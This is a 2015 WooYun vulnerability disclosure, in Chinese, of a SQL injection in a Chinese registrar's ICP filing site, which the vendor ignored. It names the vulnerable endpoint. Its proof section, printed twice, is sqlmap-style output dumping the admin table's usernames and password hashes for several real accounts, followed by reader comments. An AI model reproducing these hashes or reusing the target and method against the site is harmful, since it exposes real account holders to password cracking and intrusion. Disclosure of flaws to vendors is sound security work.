时代互联ICP备案中心SQL注入可泄漏大量域名密码信息

发表于 2015年7月24日
WooYun漏洞库
65 阅读

漏洞概要

缺陷编号：WooYun-2015-0128887

漏洞标题：时代互联ICP备案中心SQL注入可泄漏大量域名密码信息

相关厂商：广东时代互联科技有限公司

漏洞作者：kris

提交时间：2015-07-24 10:58

公开时间：2015-07-29 11:00

漏洞类型：SQL注射漏洞

危害等级：高

自评Rank：10

漏洞状态：漏洞已经通知厂商但是厂商忽略漏洞

Tags标签：

漏洞详情

披露状态：

2015-07-24: 细节已通知厂商并且等待厂商处理中
2015-07-24: 厂商已查看当前漏洞内容,细节仅向厂商公开
2015-07-29: 厂商已经主动忽略漏洞，细节向公众公开

简要描述：

时代互联ICP备案中心SQL注入可泄漏大量域名密码信息

详细说明：

ICP备案中心某查询页面POST注入...url : http://icp.now.cn:80/post.php

漏洞证明：

10:29:08] [INFO] the SQL query used returns 5 entries<br>
[10:29:08] [INFO] retrieved: user_id<br>
[10:29:08] [INFO] retrieved: smallint(5) unsigned<br>
[10:29:08] [INFO] retrieved: user_name<br>
[10:29:09] [INFO] retrieved: varchar(60)<br>
[10:29:10] [INFO] retrieved: email<br>
[10:29:11] [INFO] retrieved: varchar(60)<br>
[10:29:11] [INFO] retrieved: password<br>
[10:29:11] [INFO] retrieved: varchar(60)<br>
[10:29:11] [INFO] retrieved: group_id<br>
[10:29:11] [INFO] retrieved: int(11)<br>
[10:29:11] [INFO] fetching entries of column(s) 'email, group_id, password, user_id, user_name' for table 'ba_admin_user' in database 'ICPQY'<br>
[10:29:11] [INFO] the SQL query used returns 370 entries<br>
[10:29:15] [INFO] retrieved: [email protected]<br>
[10:29:15] [INFO] retrieved: 0<br>
[10:29:15] [INFO] retrieved: 4e0a4a13f1762b27b19c8e68c6f4aba0<br>
[10:29:15] [INFO] retrieved: 1<br>
[10:29:16] [INFO] retrieved: admin<br>
[10:29:16] [INFO] retrieved:<br>
[10:29:16] [INFO] retrieved: 4<br>
[10:29:16] [INFO] retrieved: *FD571203974BA9AFE270FE62151AE967ECA5E0AA<br>
[10:29:19] [INFO] retrieved: 13<br>
[10:29:19] [INFO] retrieved: lxlin<br>
[10:29:19] [INFO] retrieved:<br>
[10:29:19] [INFO] retrieved: 4<br>
[10:29:19] [INFO] retrieved: *8BBF4106CB3918B2F82233E999FC5DE6967F2BE4<br>
[10:29:20] [INFO] retrieved: 17<br>
[10:29:20] [INFO] retrieved: lmw264<br>
[10:29:20] [INFO] retrieved:<br>
[10:29:20] [INFO] retrieved: 4<br>
[10:29:20] [INFO] retrieved: *A57E009B0989A6C292D631A2746203C89AD6A622<br>
[10:29:20] [INFO] retrieved: 22<br>
[10:29:21] [INFO] retrieved: alice123<br>
[10:29:21] [INFO] retrieved:<br>
[10:29:21] [INFO] retrieved: 6<br>
[10:29:21] [INFO] retrieved: *5674BFF6BC10AB7E9F26E4FA4B2F13ABB1489099<br>
[10:29:21] [INFO] retrieved: 23<br>
[10:29:21] [INFO] retrieved: liangjiahui<br>
[10:29:22] [INFO] retrieved:<br>
[10:29:22] [INFO] retrieved: 4<br>
[10:29:22] [INFO] retrieved: *8A7456881D02FB060B1C70935B339E345F357E5C<br>
[10:29:25] [INFO] retrieved: 24<br>
[10:29:25] [INFO] retrieved: yhui<br>
[10:29:25] [INFO] retrieved:<br>
[10:29:25] [INFO] retrieved: 4<br>
[10:29:25] [INFO] retrieved: *EA460F671BD6D754759024E4FBCCE3DFAA04AB1B<br>
[10:29:26] [INFO] retrieved: 41<br>
[10:29:26] [INFO] retrieved: zhangliping<br>
[10:29:26] [INFO] retrieved:<br>
[10:29:26] [INFO] retrieved: 4<br>
[10:29:27] [INFO] retrieved: *6BB831B0F81F1F56EC9B834A1714053977185692<br>
[10:29:27] [INFO] retrieved: 84<br>
[10:29:30] [INFO] retrieved: cheukwu<br>
[10:29:31] [INFO] retrieved:<br>
[10:29:31] [INFO] retrieved: 4<br>
[10:29:31] [INFO] retrieved: *FBF0116DB201C3473BBE2FD1245CD178D1C78EED<br>
[10:29:31] [INFO] retrieved: 85<br>
[10:29:31] [INFO] retrieved: zengbiao<br>
[10:29:31] [INFO] retrieved:<br>
[10:29:31] [INFO] retrieved: 6<br>
[10:29:31] [INFO] retrieved: *F228B54C6D2BED807FB850D66D9350CDAA2916D1

10:29:08] [INFO] the SQL query used returns 5 entries

[10:29:08] [INFO] retrieved: user_id

[10:29:08] [INFO] retrieved: smallint(5) unsigned

[10:29:08] [INFO] retrieved: user_name

[10:29:09] [INFO] retrieved: varchar(60)

[10:29:10] [INFO] retrieved: email

[10:29:11] [INFO] retrieved: varchar(60)

[10:29:11] [INFO] retrieved: password

[10:29:11] [INFO] retrieved: varchar(60)

[10:29:11] [INFO] retrieved: group_id

[10:29:11] [INFO] retrieved: int(11)

[10:29:11] [INFO] fetching entries of column(s) 'email, group_id, password, user_id, user_name' for table 'ba_admin_user' in database 'ICPQY'

[10:29:11] [INFO] the SQL query used returns 370 entries

[10:29:15] [INFO] retrieved: [email protected]

[10:29:15] [INFO] retrieved: 0

[10:29:15] [INFO] retrieved: 4e0a4a13f1762b27b19c8e68c6f4aba0

[10:29:15] [INFO] retrieved: 1

[10:29:16] [INFO] retrieved: admin

[10:29:16] [INFO] retrieved:

[10:29:16] [INFO] retrieved: 4

[10:29:16] [INFO] retrieved: *FD571203974BA9AFE270FE62151AE967ECA5E0AA

[10:29:19] [INFO] retrieved: 13

[10:29:19] [INFO] retrieved: lxlin

[10:29:19] [INFO] retrieved:

[10:29:19] [INFO] retrieved: 4

[10:29:19] [INFO] retrieved: *8BBF4106CB3918B2F82233E999FC5DE6967F2BE4

[10:29:20] [INFO] retrieved: 17

[10:29:20] [INFO] retrieved: lmw264

[10:29:20] [INFO] retrieved:

[10:29:20] [INFO] retrieved: 4

[10:29:20] [INFO] retrieved: *A57E009B0989A6C292D631A2746203C89AD6A622

[10:29:20] [INFO] retrieved: 22

[10:29:21] [INFO] retrieved: alice123

[10:29:21] [INFO] retrieved:

[10:29:21] [INFO] retrieved: 6

[10:29:21] [INFO] retrieved: *5674BFF6BC10AB7E9F26E4FA4B2F13ABB1489099

[10:29:21] [INFO] retrieved: 23

[10:29:21] [INFO] retrieved: liangjiahui

[10:29:22] [INFO] retrieved:

[10:29:22] [INFO] retrieved: 4

[10:29:22] [INFO] retrieved: *8A7456881D02FB060B1C70935B339E345F357E5C

[10:29:25] [INFO] retrieved: 24

[10:29:25] [INFO] retrieved: yhui

[10:29:25] [INFO] retrieved:

[10:29:25] [INFO] retrieved: 4

[10:29:25] [INFO] retrieved: *EA460F671BD6D754759024E4FBCCE3DFAA04AB1B

[10:29:26] [INFO] retrieved: 41

[10:29:26] [INFO] retrieved: zhangliping

[10:29:26] [INFO] retrieved:

[10:29:26] [INFO] retrieved: 4

[10:29:27] [INFO] retrieved: *6BB831B0F81F1F56EC9B834A1714053977185692

[10:29:27] [INFO] retrieved: 84

[10:29:30] [INFO] retrieved: cheukwu

[10:29:31] [INFO] retrieved:

[10:29:31] [INFO] retrieved: 4

[10:29:31] [INFO] retrieved: *FBF0116DB201C3473BBE2FD1245CD178D1C78EED

[10:29:31] [INFO] retrieved: 85

[10:29:31] [INFO] retrieved: zengbiao

[10:29:31] [INFO] retrieved:

[10:29:31] [INFO] retrieved: 6

[10:29:31] [INFO] retrieved: *F228B54C6D2BED807FB850D66D9350CDAA2916D1

我很单纯，不深入。。。

修复方案：

你们懂的！！！

漏洞回应

厂商回应：

危害等级：无影响厂商忽略

忽略时间：2015-07-2911:00

厂商回复：

漏洞Rank：18 (WooYun评价)

评价

2010-01-01 00:00 疯狗白帽子 | Rank:22 漏洞数:2)
这个企业是真不靠谱的
2010-01-01 00:00 menmen519 白帽子 | Rank:624 漏洞数:73)
这个平台，连主站，还有一个分站，总共有50多个sql注入，拿不下shell,@疯狗
2010-01-01 00:00 酷帥王子白帽子 | Rank:94 漏洞数:12)
漏洞修补了么测试注入不存在了